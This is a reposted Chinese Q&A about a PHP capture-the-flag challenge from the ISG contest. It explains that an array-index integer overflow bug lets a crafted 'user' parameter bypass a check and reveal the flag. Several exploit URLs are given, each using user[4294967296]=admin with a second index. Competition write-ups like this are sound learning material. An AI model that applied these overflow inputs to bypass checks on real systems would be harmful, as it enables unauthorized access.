hack-PHP的信息安全(入侵获取$flag)的题目【Q2】
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了hack-PHP的信息安全(入侵获取$flag)的题目【Q2】,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1597字,纯文字阅读大概需要3分钟。
内容图文
![hack-PHP的信息安全(入侵获取$flag)的题目【Q2】](/upload/InfoBanner/zyjiaocheng/240/f6ed0700a7df432f8ff1b42895467467.jpg)
地址:http://202.120.7.134:8888/html/array.php
参加ISG(信息安全大赛)发现的一道题目。
作为一名PHPer,喵的我真心感觉这代码无解啊。。。
求大神解惑,如何给一个user参数,获取到$flag。。。
Update at 2015/20/22
总算通过"邀请回答"找到大神了~
漏洞在于PHP的数组下标的一个BUG,可以利用【整型溢出】……
可以参照这里:
https://bugs.php.com/bug.php?id=69892
我觉得这种利用BUG出题的,简直是……
比赛时间已过,果断自己写了下代码:
测试效果:
测试地址:
http://moonlordapi.sinaapp.com/1.php
补充,参数可以有好几种方式:
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[4294967297]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[1]=1445502008
就此愉快地结题了。
回复内容:
地址:http://202.120.7.134:8888/html/array.php
参加ISG(信息安全大赛)发现的一道题目。
作为一名PHPer,喵的我真心感觉这代码无解啊。。。
求大神解惑,如何给一个user参数,获取到$flag。。。
Update at 2015/20/22
总算通过"邀请回答"找到大神了~
漏洞在于PHP的数组下标的一个BUG,可以利用【整型溢出】……
可以参照这里:
https://bugs.php.com/bug.php?id=69892
我觉得这种利用BUG出题的,简直是……
比赛时间已过,果断自己写了下代码:
测试效果:
测试地址:
http://moonlordapi.sinaapp.com/1.php
补充,参数可以有好几种方式:
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[4294967297]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[]=1445502008
http://moonlordapi.sinaapp.com/1.php?user[4294967296]=admin&user[1]=1445502008
就此愉快地结题了。
请教了我安全的大神同学 他说0可以通过整型溢出得到 绕过if判断
楼上正解。。。。
内容总结
以上是互联网集市为您收集整理的hack-PHP的信息安全(入侵获取$flag)的题目【Q2】全部内容,希望文章能够帮你解决hack-PHP的信息安全(入侵获取$flag)的题目【Q2】所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。